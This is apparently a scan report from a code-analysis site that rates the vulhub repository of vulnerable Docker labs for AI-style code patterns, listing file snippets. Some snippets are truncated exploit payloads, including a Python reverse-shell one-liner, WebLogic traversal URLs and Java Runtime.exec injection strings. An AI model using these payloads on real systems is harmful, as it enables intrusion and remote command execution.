Home / vulhub / vulhub
Repository Analysis

vulhub/vulhub

Pre-Built Vulnerable Environments Based on Docker-Compose

4.4 Likely human-written View on GitHub
4.4
Adjusted Score
4.4
Raw Score
100%
Time Factor
2026-05-12
Last Push
20,760
Stars
Dockerfile
Language
86,458
Lines of Code
1551
Files
145
Pattern Hits
2026-05-31
Scan Date

Score History

Severity Breakdown

CRITICAL 13HIGH 9MEDIUM 23LOW 100

Pattern Findings

145 matches across 13 categories. Click a row to expand file-level details.

Hallucination Indicators13 hits · 160 pts
SeverityFileLineSnippet
CRITICALactivemq/CVE-2022-41678/poc.py12 'out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %>')
CRITICALweblogic/CVE-2020-14882/README.md45http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2
CRITICALweblogic/CVE-2020-14882/README.md78http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri
CRITICALweblogic/CVE-2020-14882/README.zh-cn.md41http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2
CRITICALweblogic/CVE-2020-14882/README.zh-cn.md74http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri
CRITICALjava/rmi-registry-bind-deserialization-bypass/README.md13 || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
CRITICALjava/rmi-registry-bind-deserialization-bypass/README.md17 || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
CRITICALjava/rmi-registry-bind-deserialization-bypass/README.md18 || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
CRITICAL…i-registry-bind-deserialization-bypass/README.zh-cn.md11 || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
CRITICAL…i-registry-bind-deserialization-bypass/README.zh-cn.md15 || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
CRITICAL…i-registry-bind-deserialization-bypass/README.zh-cn.md16 || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
CRITICALhugegraph/CVE-2024-27348/README.md44 "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect
CRITICALhugegraph/CVE-2024-27348/README.zh-cn.md42 "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect
Decorative Section Separators14 hits · 51 pts
SeverityFileLineSnippet
MEDIUMopenclaw/CVE-2026-25253/poc.py696 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py698 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py704 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py706 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py931 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py933 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py229 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py233 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py669 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py671 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py995 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py997 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py1018 # -------------------------------------------------------
MEDIUMopenclaw/CVE-2026-25253/poc.py1020 # -------------------------------------------------------
Excessive Try-Catch Wrapping32 hits · 37 pts
SeverityFileLineSnippet
LOWopenclaw/CVE-2026-25253/poc.py536 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py544 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py551 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py692 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py395 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py515 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py624 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py721 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py782 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py816 except Exception:
LOWopenclaw/CVE-2026-25253/poc.py851 except Exception:
LOWtests/tools/update_dockerhub.py118 except Exception as e:
MEDIUMtests/tools/update_dockerhub.py112def main():
MEDIUMtests/tools/check_image_arch.py281 print(f"Error: {args.file} not found.", file=sys.stderr)
LOWtests/tools/check_image_arch.py323 except Exception as e:
LOWerlang/CVE-2025-32433/exploit.py145 except Exception as e:
LOWshowdoc/3.2.5-sqli/poc.py26 except Exception as e:
MEDIUMsuperset/CVE-2023-27524/CVE-2023-27524.py36 print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
MEDIUMsuperset/CVE-2023-27524/CVE-2023-27524.py46 print('Error: No session cookie found')
MEDIUMsuperset/CVE-2023-27524/CVE-2023-27524.py55 print('Error: Not a Flask session cookie')
LOWsuperset/CVE-2023-27524/CVE-2023-27524.py98 except Exception as e_inner:
LOWsuperset/CVE-2023-27524/CVE-2023-27524.py119 except Exception as e_inner:
LOWsuperset/CVE-2023-27524/CVE-2023-27524.py124 except Exception as e:
LOWnginx-ui/CVE-2026-27944/poc.py83 except Exception as e:
LOWnginx-ui/CVE-2026-27944/poc.py210 except Exception as e:
LOWzabbix/CVE-2016-10134/CVE-2016-10134.py89 except Exception:
LOWcraftcms/CVE-2025-32432/poc.py203 except Exception as e:
LOWingress-nginx/CVE-2025-1974/exploit.py113 except Exception as e:
MEDIUMingress-nginx/CVE-2025-1974/exploit.py114 print(f"Error on /proc/{proc}/fd/{fd}: {e}")
MEDIUMingress-nginx/CVE-2025-1974/exploit.py134 print(f"Error: Shell file '{shell_file}' not found")
LOWingress-nginx/CVE-2025-1974/exploit.py150 except Exception as e:
MEDIUMingress-nginx/CVE-2025-1974/exploit.py151 print(f"Error connecting to {host}:{port}: {e} - host is up?")
Cross-Language Confusion6 hits · 30 pts
SeverityFileLineSnippet
HIGHwordpress/pwnscriptum/exploit.py17 return 'target(any -froot@localhost -be %s null)' % command
HIGHairflow/CVE-2020-11981/exploit_airflow_celery.py8ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3
HIGHjira/CVE-2019-11581/poc.py28#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
HIGHjira/CVE-2019-11581/poc.py40 payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoa
HIGHingress-nginx/CVE-2025-1974/exploit.py54 "creationTimestamp": null,
HIGHingress-nginx/CVE-2025-1974/exploit.py87 "oldObject": null,
Verbosity Indicators14 hits · 25 pts
SeverityFileLineSnippet
LOWopenclaw/CVE-2026-25253/poc.py932 # Step 7: Restore original cliBackends config
LOWopenclaw/CVE-2026-25253/poc.py828 # Step 5: Set session model to the injected CLI backend
LOWopenclaw/CVE-2026-25253/poc.py868 # Step 6: Trigger agent execution — CLI backend spawns command directly
LOWnginx-ui/CVE-2026-27944/poc.py180 # Step 1: Create a new admin user via X-Node-Secret
LOWnginx-ui/CVE-2026-27944/poc.py195 # Step 2: Get RSA public key for encrypted login
LOWnginx-ui/CVE-2026-27944/poc.py214 # Step 3: RSA-encrypt login credentials and authenticate
LOWnginx-ui/CVE-2026-27944/poc.py253 # Step 1: Download backup
LOWnginx-ui/CVE-2026-27944/poc.py263 # Step 2: Parse encryption key
LOWnginx-ui/CVE-2026-27944/poc.py266 # Step 3: Decrypt backup
LOWnginx-ui/CVE-2026-27944/poc.py269 # Step 4: Extract secrets
LOWnginx-ui/CVE-2026-27944/poc.py272 # Step 5: Exploit with Node Secret
LOWnginx-ui/CVE-2026-27944/poc.py279 # Step 6: Optionally create new admin user and obtain JWT token
LOWcraftcms/CVE-2025-32432/poc.py178 # Step 2: Inject PHP payload into session
LOWcraftcms/CVE-2025-32432/poc.py183 # Step 3: Trigger RCE
Unused Imports22 hits · 22 pts
SeverityFileLineSnippet
LOWactivemq/CVE-2023-46604/poc.py1
LOWactivemq/CVE-2022-41678/poc.py8
LOWcmsms/CVE-2021-26120/poc.py4
LOWpython/PIL-CVE-2018-16509/app.py1
LOWpython/PIL-CVE-2017-8291/app.py5
LOWgrafana/admin-ssrf/grafana-ssrf.py15
LOWairflow/CVE-2020-11981/exploit_airflow_celery.py1
LOWopensmtpd/CVE-2020-7247/poc.py19
LOWnginx-ui/CVE-2026-27944/poc.py24
LOWopenssl/CVE-2014-0160/ssltest.py12
LOWdjango/CVE-2020-9402/vuln/views.py1
LOWdjango/CVE-2021-35042/vuln/urls.py1
LOWdjango/CVE-2021-35042/vuln/urls.py1
LOWdjango/CVE-2022-34265/vuln/models.py1
LOWdjango/CVE-2022-34265/vuln/urls.py1
LOWdjango/CVE-2022-34265/vuln/urls.py1
LOWdjango/CVE-2022-34265/vuln/views.py1
LOWbase/pgadmin/6.16/config_local.py1
LOWbase/pgadmin/7.6/config_local.py1
LOWbase/django/2.0.7/app.py3
LOWingress-nginx/CVE-2025-1974/exploit.py1
LOWspring/CVE-2025-41242/poc.py6
Over-Commented Block17 hits · 16 pts
SeverityFileLineSnippet
LOWcouchdb/CVE-2022-24706/poc.py1# Exploit Title: Remote Command Execution via Erlang Distribution Protocol
LOWapisix/CVE-2020-13945/config.yml1#
LOWapisix/CVE-2021-45232/apisix.yml1#
LOWapisix/CVE-2021-45232/dashboard.yml1#
LOWopenclaw/CVE-2026-25253/poc.py221 websockets.exceptions.ConnectionClosedError) as exc:
LOWthinkphp/in-sqlinjection/www/database.php1<?php
LOWopensmtpd/CVE-2020-7247/poc.py1# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
LOWbase/couchdb/2.1.0/docker-entrypoint.sh1#!/bin/bash
LOWbase/couchdb/3.2.1/docker-entrypoint.sh1#!/bin/bash
LOWbase/couchdb/1.6.0/docker-entrypoint.sh1#!/bin/bash
LOWbase/aj-report/1.4.0/bootstrap.yml61 #若要使用minio文件存储,请启用以下配置
LOWbase/thinkphp/2.1/index.php1<?php
LOWbase/solr/8.6.1/cloud/zoo.cfg1# The number of milliseconds of each tick
LOWbase/solr/8.6.1/cloud/zoo.cfg21#
LOWbase/solr/8.3.0/cloud/zoo.cfg1# The number of milliseconds of each tick
LOWbase/solr/8.3.0/cloud/zoo.cfg21#
LOWbase/superset/2.0.1/run-server.sh1#!/usr/bin/env bash
Cross-File Repetition3 hits · 15 pts
SeverityFileLineSnippet
HIGHpython/unpickle/README.md0python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
HIGHpython/unpickle/README.zh-cn.md0python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
HIGHpython/unpickle/exp.py0python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
Deep Nesting11 hits · 10 pts
SeverityFileLineSnippet
LOWactivemq/CVE-2022-41678/poc.py972
LOWtomcat/CVE-2020-1938/poc.py181
LOWopenclaw/CVE-2026-25253/poc.py457
LOWopenclaw/CVE-2026-25253/poc.py638
LOWtests/tools/check_image_arch.py262
LOWtests/check/test_env_toml.py60
LOWsuperset/CVE-2023-27524/CVE-2023-27524.py18
LOWnginx-ui/CVE-2026-27944/poc.py88
LOWimagemagick/CVE-2022-44268/poc.py41
LOWbase/saltstack/2019.2.3/saltinit.py8
LOWbase/saltstack/3002/saltinit.py8
Redundant / Tautological Comments4 hits · 6 pts
SeverityFileLineSnippet
LOWopenclaw/CVE-2026-25253/poc.py805 # Check if the connection is still open before deciding.
LOW.github/workflows/update-vulhub-org.yml60 # Check if there are changes to commit
LOWbase/n8n/1.65.0/docker-entrypoint.sh15# Check if admin already exists
LOWbase/jenkins/2.46.1/install-plugins.sh231 # Check if there's a version-specific update center, which is the case for LTS versions
Hyper-Verbose Identifiers5 hits · 4 pts
SeverityFileLineSnippet
LOWtomcat/CVE-2020-1938/poc.py231def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
LOWopenclaw/CVE-2026-25253/poc.py200async def _connect_and_authenticate(target, token_data, quiet=False):
LOWopenclaw/CVE-2026-25253/poc.py457async def _wait_for_gateway_restart(target, max_wait=30, token_data=None):
LOWtests/check/test_env_toml.py60def test_dockerfile_covers_all_vulhub_images():
LOWphp/xdebug-rce/exp.py43class XDebugRequestHandler(socketserver.BaseRequestHandler):
Self-Referential Comments1 hit · 3 pts
SeverityFileLineSnippet
MEDIUMbase/postgres/9.6.7/docker-entrypoint.sh40 # Create the transaction log directory before initdb is run (below) so the directory is owned by the correct user
Fake / Example Data3 hits · 2 pts
SeverityFileLineSnippet
LOWcomfyui/CVE-2025-67303/evil-git-server.py65 subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=src_path, check=True,
LOWjira/CVE-2019-11581/poc.py12 "from": "test@test.com",
LOWbase/n8n/1.65.0/docker-entrypoint.sh50 "placeholder": "John Doe"